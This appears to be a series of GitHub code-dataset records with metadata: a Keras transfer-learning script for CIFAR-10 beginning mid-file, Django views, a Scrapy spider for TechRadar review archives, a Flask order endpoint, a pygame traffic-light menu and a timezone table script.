model.\r\n\r\nThe second way is to connect a well-defined model and self-defined model. Then freeze the\r\nparameters of well-defined model and only train on the residual parts. 
And if you like, you\r\ncan train the whole model without any frozen layers.\r\n\r\nThe greatest merit of transfer learning, obviously, is effortless and energy-saving.\r\nEspecially when you do not have a powerful computer, like me now at home, it really helps a lot.\r\n\r\nReferences:\r\nhttps://blog.keras.io/building-powerful-image-classification-models-using-very-little-data.html\r\nhttps://riptutorial.com/keras/example/32608/transfer-learning-using-keras-and-vgg\r\n'''\r\n\r\nimport os\r\nos.environ['HDF5_DISABLE_VERSION_CHECK'] = '2'\r\nimport pickle\r\nimport numpy as np\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Model, Sequential\r\nfrom keras.layers import Dense, Flatten, Dropout, Input\r\nfrom keras.optimizers import SGD\r\nfrom keras import applications\r\nfrom keras.utils import to_categorical\r\n\r\n# This function is uesed to data. And the data used here is cifar-10, which can be downloaded\r\n# from the public site easily.\r\ndef readData(path):\r\n files = os.listdir(path)\r\n data = np.empty([len(files), 10000, 3072])\r\n labels = np.empty([len(files), 10000])\r\n for i, file in enumerate(files):\r\n with open(path + '/' + file, 'rb') as f:\r\n dict = pickle.load(f, encoding='bytes')\r\n data[i] = dict[b'data']\r\n labels[i] = dict[b'labels']\r\n # print(data[i].shape)\r\n # print(labels[i].shape)\r\n print('read success')\r\n return data, labels\r\n\r\n\r\n# This function can transfer the raw data into our desire format.\r\n# np.moveaxis() can help to switch between channel-first mode and channel-last.\r\ndef dataPreprocess(train_path, validation_path, test_path):\r\n train_data, train_labels = readData(train_path)\r\n validation_data, validation_labels = readData(validation_path)\r\n test_data, test_labels = readData(test_path)\r\n\r\n print('read Success')\r\n\r\n print(\"train_data: \", train_data.shape)\r\n print(\"train_labels: \", train_labels.shape)\r\n\r\n print(\"validation_data: \", validation_data.shape)\r\n print(\"validation_labels: \", validation_labels.shape)\r\n\r\n print(\"test_data: \", test_data.shape)\r\n print(\"test_labels: \", test_labels.shape)\r\n\r\n train_data = train_data.reshape((-1, 3, 32, 32))\r\n train_data = np.moveaxis(train_data, 1, -1)\r\n train_labels = train_labels.reshape((-1, 1))\r\n\r\n validation_data = validation_data.reshape((-1, 3, 32, 32))\r\n validation_data = np.moveaxis(validation_data, 1, -1)\r\n validation_labels = validation_labels.reshape((-1, 1))\r\n\r\n test_data = test_data.reshape((-1, 3, 32, 32))\r\n test_data = np.moveaxis(test_data, 1, -1)\r\n test_labels = test_labels.reshape((-1, 1))\r\n\r\n print('after reshape: ')\r\n\r\n print(\"train_data: \", train_data.shape)\r\n print(\"train_labels: \", train_labels.shape)\r\n\r\n print(\"validation_data: \", validation_data.shape)\r\n print(\"validation_labels: \", validation_labels.shape)\r\n\r\n print(\"test_data: \", test_data.shape)\r\n print(\"test_labels: \", test_labels.shape)\r\n\r\n return train_data, train_labels, validation_data, validation_labels, test_data, test_labels\r\n\r\n\r\n# This function works to use VGG net to pre-process data and save the output as my model's input.\r\n# Here the data augment has been applied. 
The generator works in loops to generate 'batch_size'\r\n# pieces of data and, because of it, we have to set \"steps\" in the predict or fit function to\r\n# avoid endless loops.\r\ndef transVGGModel(train_data, train_labels, batch_size, file_name):\r\n datagen = ImageDataGenerator(rotation_range=10, width_shift_range=0.1, height_shift_range=0.1,\r\n horizontal_flip=True, vertical_flip=True, rescale=1.0 / 255)\r\n generator = datagen.flow(x=train_data, y=train_labels, batch_size=batch_size)\r\n model = applications.VGG16(include_top=False, weights='imagenet')\r\n step_num = train_data.shape[0] // batch_size\r\n bottlenect_feature = model.predict_generator(generator, steps=step_num)\r\n np.save(file_name, bottlenect_feature)\r\n\r\n# Here is my model, which places like the top of a bottle.\r\n# And what you should pay attention to is that if the Model module applied,\r\n# then the first layer should be the Input layer, serving for indicates the\r\n# dimension of input data. This problem does not show in the Sequential module.\r\ndef myTopModel(input_shape):\r\n input_layer = Input(shape=input_shape, name='top_layer0')\r\n x = Flatten(name='top_layer1')(input_layer)\r\n x = Dense(512, activation='relu', name='top_layer2')(x)\r\n x = Dropout(0.5)(x)\r\n x = Dense(256, activation='relu', name='top_layer3')(x)\r\n x = Dropout(0.3)(x)\r\n output_layer = Dense(10, activation='softmax', name='top_layer4')(x)\r\n\r\n model = Model(inputs=input_layer, outputs=output_layer)\r\n\r\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer=sgd,\r\n loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n return model\r\n\r\n# Load the output from well-defined model and train my model.\r\ndef preTrainMyTopModel(bottle_train_file_name):\r\n vgg_train_data = np.load(bottle_train_file_name)\r\n print(\"train_data: \", vgg_train_data.shape)\r\n input_shape = vgg_train_data.shape[1:]\r\n model = myTopModel(input_shape)\r\n train_history = model.fit(x=vgg_train_data, y=train_labels, batch_size=batch_size, verbose=1, epochs=1)\r\n model.save_weights(top_model_weights_path)\r\n\r\n# This function first catenate the well-defined model with my model. Then freeze the former part\r\n# and train the latter one.\r\n# Here is a question I have spend a lot of time on it: when applying well-defined models, it will\r\n# return a Model-like object. So, it will be a good habit to set a Input layer for it, if you want\r\n# to change its architecture.\r\n# Besides, now I understand what the tensor means deeper. When adding a new layer, the function will\r\n# return a tensor instead of a layer-object or somethings else. Unlike vectors' shape, the tensor must\r\n# have more attribute, acting as a class and is more powerful than a simple shape. I think the dictionary\r\n# of all the layers must be one of them.\r\n# Therefor, when you add an old layer to a new one, the dictionary will be updated and passed. 
That\r\n# will be helpful when the keras does forward and backward propagation.\r\n\r\ndef smallDataModel(top_model_weights_path, input_shape):\r\n load_model = applications.VGG16(weights='imagenet', include_top=False)\r\n old_layer_num = len(load_model.layers)\r\n print('Model loaded.')\r\n input_layer = Input(shape=input_shape)\r\n load_model = load_model(input_layer)\r\n\r\n x = Flatten(name='top_layer1')(load_model)\r\n x = Dense(512, activation='relu', name='top_layer2')(x)\r\n x = Dropout(0.5)(x)\r\n x = Dense(256, activation='relu', name='top_layer3')(x)\r\n x = Dropout(0.3)(x)\r\n output_layer = Dense(10, activation='softmax', name='top_layer4')(x)\r\n\r\n model = Model(inputs=input_layer, outputs=output_layer)\r\n\r\n for layer in model.layers[:old_layer_num]:\r\n layer.trainable = True\r\n\r\n sgd = SGD(lr=0.001, decay=1e-6, momentum=0.9, nesterov=True)\r\n model.compile(optimizer=sgd,\r\n loss='categorical_crossentropy', metrics=['accuracy'])\r\n\r\n return model\r\n\r\n\r\n# setup the orginal file path and images' properties.\r\ntrain_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/train_data'\r\nvalidation_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/validation_data'\r\ntest_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/test_data'\r\ntop_model_weights_path = 'C:/Users/YueYuHou/Desktop/cifar-10-python/top_model_weights_path.h5'\r\n\r\nimg_height = 32\r\nimg_weight = 32\r\nimg_channel = 3\r\nbatch_size = 5000\r\n\r\n# data preparation\r\ntrain_data, train_labels, validation_data, validation_labels, test_data, \\\r\ntest_labels = dataPreprocess(train_path, validation_path, test_path)\r\n\r\n# change labels from integer to one-hot code.\r\ntrain_labels = to_categorical(train_labels, num_classes=10)\r\nvalidation_labels = to_categorical(validation_labels, num_classes=10)\r\ntest_labels = to_categorical(test_labels, num_classes=10)\r\n\r\n# using VGG to pre-train model and save results\r\nbottle_train_file_name = 'bottle_train.npy'\r\n# transVGGModel(train_data, train_labels, batch_size, bottle_train_file_name)\r\n\r\n# training my model.\r\npreTrainMyTopModel(bottle_train_file_name)\r\n\r\n\r\n##### This works as the second way for applying transfer learning. #######\r\n# I don't want to write two files to talk about the same topic. So I write them in one file.\r\ninput_shape = train_data.shape[1:]\r\nmySmallDataModel = smallDataModel(top_model_weights_path, input_shape)\r\n\r\ndatagen = ImageDataGenerator(rotation_range=10, width_shift_range=0.1, height_shift_range=0.1,\r\n horizontal_flip=True, vertical_flip=True, rescale=1.0 / 255)\r\ntrain_generator = datagen.flow(x=train_data, y=train_labels, batch_size=batch_size)\r\n\r\nvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\r\nvalidation_generator = validation_datagen.flow(x=validation_data, y=validation_labels, batch_size=batch_size)\r\n\r\ntest_datagen = ImageDataGenerator(rescale=1. 
/ 255)\r\ntest_generator = test_datagen.flow(x=test_data, y=test_labels, batch_size=batch_size)\r\n\r\ntrain_steps_per_epoch = train_data.shape[0] // batch_size\r\nvali_steps_per_epoch = validation_data.shape[0] // batch_size\r\ntest_steps_per_epoch = test_data.shape[0] // batch_size\r\nmyFitHistory = mySmallDataModel.fit_generator(train_generator, steps_per_epoch=train_steps_per_epoch, epochs=10,\r\n validation_data=validation_generator,\r\n validation_steps=vali_steps_per_epoch)\r\n\r\nmyPredicHis = mySmallDataModel.predict_generator(test_generator, steps=test_steps_per_epoch, verbose=1)\r\n", "repo_name": "Yueyuhou/Transfer-learning-and-data-augment-practise-with-Keras.", "sub_path": "SmallData.py", "file_name": "SmallData.py", "file_ext": "py", "file_size_in_byte": 10425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 40, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.moveaxis", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 101, "usage_type": "call"}, {"api_name": "keras.applications.VGG16", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 114, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 115, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 116, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 117, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 118, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 119, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 120, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 122, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 132, "usage_type": "call"}, {"api_name": "keras.applications.VGG16", "line_number": 152, "usage_type": "call"}, {"api_name": "keras.applications", "line_number": 152, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 155, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 158, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 159, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 160, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 161, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 162, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 163, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 165, "usage_type": "call"}, {"api_name": "keras.optimizers.SGD", "line_number": 170, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 193, "usage_type": "call"}, 
{"api_name": "keras.utils.to_categorical", "line_number": 194, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 195, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 210, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 214, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.ImageDataGenerator", "line_number": 217, "usage_type": "call"}]} +{"seq_id": "36521275966", "text": "from django.shortcuts import render\nfrom projects.models import Project\n\n# Create your views here.\n\ndef project_index(request): # @4.0\n # query --> A command that allows you to create, retrieve, update or delete objects(rows) in your database.\n \n projects = Project.objects.all() # query to get all objects in the table i.e projects.\n \n context = { # The context dictionary is used to send information to our template\n 'projects': projects # We assign our queryset of all projects to entry named 'projects'\n } # Every view function we create needs to have a context dictionary.\n\n return render(request, 'project_index.html', context) # render basically takes in the request, template and the queries made in context dictionary.\n\n\ndef project_detail(request, pk): # @4.1\n project = Project.objects.get(pk=pk) # This query retrieves the project with primary key(pk) equal to that in the function argument.\n\n context = {\n 'project': project\n }\n\n return render(request, 'project_detail.html', context)\n\n\n\n\n\n", "repo_name": "ameerhkhan/Django-Practice-Exercises", "sub_path": "second-django-app/personal_portfolio/projects/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "projects.models", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.models.Project.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 9, "usage_type": "name"}, {"api_name": "projects.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.models.Project.objects.get", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.models.Project.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.models.Project", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "20410887378", "text": "import nltk\nimport scrapy\nfrom ..items import TechradarItem\nimport time\nimport random\nimport re\nfrom bs4 import BeautifulSoup\nfrom techradar.spiders.preprocess import PreprocessArticle\nfrom techradar.spiders.uploader import upload_article\nimport os\nfrom ..settings import save_paths\nfrom collections import defaultdict\nfrom nltk import word_tokenize\nfrom nltk.corpus import stopwords\n# print(stopwords.words('english'))\n\n\nclass ReviewsSpider(scrapy.Spider):\n name = 'reviews'\n \n month = 1\n year = 2020\n start_urls = [f'https://www.techradar.com/reviews/archive/{year}/{month}/']\n fpath = os.getcwd()\n output = f\"\"\"articles_{str(month)}_{str(year)}.xml\"\"\"\n \n save_as = f\"\"\"{fpath}/articles_{str(month)}_{str(year)}.xml\"\"\"\n # word_counter = defaultdict(lambda: 
0)\n # if not os.path.isfile(save_as):\n # with open(save_as,'a') as f:\n # pass\n\n def parse(self, response, **kwargs):\n \n all_links = []\n items = TechradarItem()\n # xpath to extract the links from each page\n scrapped_links = response.xpath('//div/a/@href').getall()\n scrapped_links2 = response.xpath('//li/a/@href').getall()\n all_links.extend(scrapped_links)\n all_links.extend(scrapped_links2)\n scrapped_links = []\n \n # self.month += 1\n ReviewsSpider.month += 1 # increment month for link pagination\n next_page = f'https://www.techradar.com/reviews/archive/{str(ReviewsSpider.year)}/{str(ReviewsSpider.month)}/'\n \n for link in all_links:\n if not re.search(\"https://www.techradar.com/reviews/archive/.*\", link): # filter unnessacary links (eg archive)\n \n try:\n print(link)\n print(response)\n print('\\n\\n\\n')\n # Get only the links from news or reviews using regex\n if len(re.findall(r\"https://www.techradar.com/(reviews|news)/.\", link)) > 0:\n if link not in scrapped_links:\n scrapped_links.append(link)\n time.sleep(random.randint(0,1))\n yield scrapy.Request(link, callback = self.parse_link_contents)\n \n \n # items['links'] = link\n # yield items\n\n except IndexError:\n # response.follow(next_page, callback=self.parse)\n pass\n\n except Exception as e:\n print(e)\n pass\n\n time.sleep(random.randint(1,3)) # Sleep before the next request\n\n if (ReviewsSpider.month) <= 2:\n # Callback on it's self to visit next link (archives of months)\n yield response.follow(next_page, callback=self.parse)\n \n # time.sleep(5)\n # upload_article(source_name = save_paths, target_name='articles_2020.xml')\n\n # else:\n # # UPLOADE TO AZURE\n # try:\n # upload_article(source_name = save_paths, target_name='articles_2020.xml')\n # # os.remove(ReviewsSpider.save_as)\n # except Exception as e:\n # print(e)\n \n \n\n \n def parse_link_contents(self,response,**kwargs):\n # full_art = response.meta.get('full_art')\n content = response.text\n soup = BeautifulSoup(content, 'html.parser')\n content = soup.prettify()\n link_name = response.url.split('/')[-2] + \"_\" +response.url.split('/')[-1]\n title = response.url.split('/')[-1]\n \n with open(save_paths,'a') as f:\n f.write(PreprocessArticle().parse_paragraphs(content,link_name,title))\n f.close()\n\n \n\n\n\n\n# TODO Proxy rotation - (if needed)\n# TODO save file to Azure File server and remove file \n# connect GoogleDrive API as FileServer\n", "repo_name": "panostraf/search_engines_crawler", "sub_path": "techradar/techradar/spiders/reviews_2.py", "file_name": "reviews_2.py", "file_ext": "py", "file_size_in_byte": 3944, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "scrapy.Spider", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 24, "usage_type": "call"}, {"api_name": "items.TechradarItem", "line_number": 36, "usage_type": "call"}, {"api_name": "re.search", "line_number": 49, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 56, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 59, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 59, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 60, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 74, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 97, "usage_type": "call"}, {"api_name": 
"settings.save_paths", "line_number": 102, "usage_type": "argument"}, {"api_name": "techradar.spiders.preprocess.PreprocessArticle", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "34996890557", "text": "from flask import Blueprint\nfrom flask_api import status\nimport mysql.connector\nimport json\nimport conf\n\norder = Blueprint('order', __name__)\n\n\n@order.route('/order//', methods=['GET'])\ndef handle(session_id, order_id):\n # session_ids are 16 characters long\n if (len(session_id) > 16):\n return '', status.HTTP_400_BAD_REQUEST\n\n connector = mysql.connector.connect(\n user=conf.user,\n database=conf.database,\n passwd=conf.passwd,\n host=conf.host,\n port=conf.port)\n\n answer = {}\n\n cursor = connector.cursor()\n\n return_status = cursor.callproc('get_order', args=[session_id, order_id, 0])\n\n if(return_status[2] == 0):\n # success!\n result = next(cursor.stored_results())\n\n line = next(result)\n\n answer['ordered_on'] = line[0]\n answer['order_total'] = line[1]\n answer['order_status'] = line[2]\n answer['items'] = []\n\n cursor.callproc('get_order_items', args=[order_id])\n\n result = next(cursor.stored_results())\n\n for line in result:\n answer['items']. append({'item_id': line[0], 'amount': line[1]})\n\n return json.dumps(answer, default=str), status.HTTP_200_OK\n elif(return_status[2] == 1 or return_status[2] == 2):\n # user id could not be found or didn't own the order\n connector.close()\n return '', status.HTTP_401_UNAUTHORIZED\n else:\n # oh noes\n connector.close()\n return '', status.HTTP_500_INTERNAL_SERVER_ERROR\n", "repo_name": "qwertxzy/nozama-api", "sub_path": "endpoints/order.py", "file_name": "order.py", "file_ext": "py", "file_size_in_byte": 1531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_400_BAD_REQUEST", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 14, "usage_type": "name"}, {"api_name": "mysql.connector.connector.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 16, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 16, "usage_type": "name"}, {"api_name": "conf.user", "line_number": 17, "usage_type": "attribute"}, {"api_name": "conf.database", "line_number": 18, "usage_type": "attribute"}, {"api_name": "conf.passwd", "line_number": 19, "usage_type": "attribute"}, {"api_name": "conf.host", "line_number": 20, "usage_type": "attribute"}, {"api_name": "conf.port", "line_number": 21, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 47, "usage_type": "call"}, {"api_name": "flask_api.status.HTTP_200_OK", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 47, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_401_UNAUTHORIZED", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 51, "usage_type": "name"}, {"api_name": "flask_api.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask_api.status", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "40348893038", "text": "import pygame, pickle, sys, time, random, math\nfrom _thread import *\n\nstop_threads=True\npygame.display.init()\npygame.font.init()\n\nredAmber=pygame.image.load(\"TL A 
R.png\")\nred=pygame.image.load(\"TL R.png\")\namber=pygame.image.load(\"TL A.png\")\ngreen=pygame.image.load(\"TL G.png\")\n\nWIDTH=1200\nHEIGHT=800\nBACKGROUND=pygame.Color(\"#EAEAEA\")\nBLUE=pygame.Color(\"#00A896\")\nORANGE=pygame.Color(\"#89043D\")\nLB=pygame.Color(\"#2FE6DE\")\n\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\n\nstore = {TL:redAmber, Road:roadyBoi}\n\nclass Object(object):\n def __init__(self, x, y, width, height, typ):\n self.typ=typ\n self.x=x\n self.y=y\n self.width=width\n self.height=height\n\n def move(self, x, y, win):\n self.x=x\n self.y=y\n\n def draw(self, win):\n win.blit(redAmber, (self.x+1, self.y))\n pygame.draw.rect(win, self.typ, (self.x, self.y, self.width, self.height), 2)\n\nclass TrafficLight(Object):\n def __init__(self, x, y, timeOn, timeOff, points):\n width=20\n height=20\n Object.__init__(self, x, y, width, height, \"TL\")\n self.x=x\n self.y=y\n self.timeOn=timeOn\n self.timeOff=timeOff\n self.points=points\n\n \ndef drawText(win, text, x, y, size, colour):\n try:\n font = pygame.font.SysFont(\"Comic Sans\", size)\n toBlit = font.render(text, 1, colour, False)\n win.blit(toBlit, ( int( x-(toBlit.get_width()/2) ) , int( y-(toBlit.get_height()/2)) ))\n except:\n print('Font Error, Saw It Coming Ngl')\n\ndef normalMenu(win):\n pygame.draw.rect(win,BLUE, (0, 600, 100, 100), 2)\n drawText(win, \"Lights\", 50, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 600, 100, 100), 2)\n drawText(win, \"Roads\", 150, 620, 30, BLUE)\n pygame.draw.rect(win,BLUE, (100, 700, 100, 100), 2)\n drawText(win, \"Junctions\", 50, 720, 30, BLUE)\n pygame.draw.rect(win,BLUE, (0, 700, 100, 100), 2)\n drawText(win, \"Other\", 150, 720, 30, BLUE)\n \ndef drawAll(win, listy):\n win.fill(BACKGROUND)\n drawText(win, \"Return To Menu\", 60, 20, 20, BLUE)\n pygame.draw.rect(win,BLUE, (0, 10, 120, 20), 2)\n normalMenu(win)\n \n for i in listy:\n i.draw(win)\n\n pygame.display.flip()\n \ndef main(win):\n print(\"Design Phase Started\")\n pygame.display.set_caption('Design Phase')\n\n itemList=[]\n light=TrafficLight(40, 645, None, None, 0)\n itemList.append(light)\n\n while True:\n drawAll(win, itemList)\n \n mainMenu(win)\n\n\n\n\ndef threaded_title(win, WIDTH, HEIGHT):\n global stop_threads\n while stop_threads:\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE)\n drawText(win, \"Click To Start\", int(WIDTH/2), int(-100+HEIGHT/2), 50, BLUE)\n pygame.display.flip() \n else:\n break\n time.sleep(0.5)\n if stop_threads:\n win.fill(BACKGROUND) \n drawText(win, \"Traffic Light Optimiser\", int(WIDTH/2), int(-200+HEIGHT/2), 60, BLUE) \n pygame.display.flip()\n else:\n break\n time.sleep(0.5)\n print(\"Thread Ended\")\n return\ndef mainMenu(win):\n global stop_threads \n print(\"Running Main Menu\")\n pygame.display.set_caption(\"Reinforcement Learning Traffic Lights\") \n stop_threads=True \n run = True \n clock = pygame.time.Clock() \n start_new_thread(threaded_title, (win, WIDTH, HEIGHT))\n print(\"Thread Started\") \n while run:\n clock.tick(30) \n for event in pygame.event.get():\n if event.type==pygame.QUIT:#Quit\n stop_threads=False\n print(\"Goodbye!\")\n pygame.quit()\n sys.exit()\n if event.type==pygame.MOUSEBUTTONDOWN:\n run = False\n stop_threads=False\n main(win)\nwhile True:\n try:\n mainMenu(win)\n except:\n sys.exit()\n", "repo_name": "BigDataCrackhead/NEA", "sub_path": "Old Versions/V2.py", "file_name": "V2.py", "file_ext": "py", "file_size_in_byte": 4003, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.display.init", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.Color", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Color", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 61, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 83, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 104, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 104, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 111, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 111, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 
123, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 128, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 129, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 132, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "17069256446", "text": "#!/usr/bin/env python3\n\nimport pytz\nfrom datetime import datetime\nfrom random import choice\n\nfrom tabulate import tabulate\n\n\nZONES = {\n 'Cape Town': 'Africa/Johannesburg',\n 'London': 'Europe/London',\n 'Toronto': 'Canada/Eastern',\n 'Kathmandu': 'Asia/Kathmandu',\n 'Nairobi': 'Africa/Nairobi',\n}\nDATE_FORMAT = '%d-%m-%y %H:%M:%S'\nHEADER = ['Location', 'Date', 'Time']\nTABLE_FORMAT = 'pretty'\nTABLE_FORMATS = [\n 'plain',\n 'simple',\n 'github',\n 'grid',\n 'fancy_grid',\n 'pipe',\n 'orgtbl',\n 'jira',\n 'presto',\n 'pretty',\n 'psql',\n]\n\n\ndef main(fmt=None, header=[]):\n table = []\n for label, tz in ZONES.items():\n dt_str = datetime.now(pytz.timezone(tz)).strftime(DATE_FORMAT)\n table.append([label] + dt_str.split())\n\n fmt = fmt or TABLE_FORMAT\n print(tabulate(table, headers=header, tablefmt=fmt))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "joshuaberetta/times", "sub_path": "times.py", "file_name": "times.py", "file_ext": "py", "file_size_in_byte": 904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 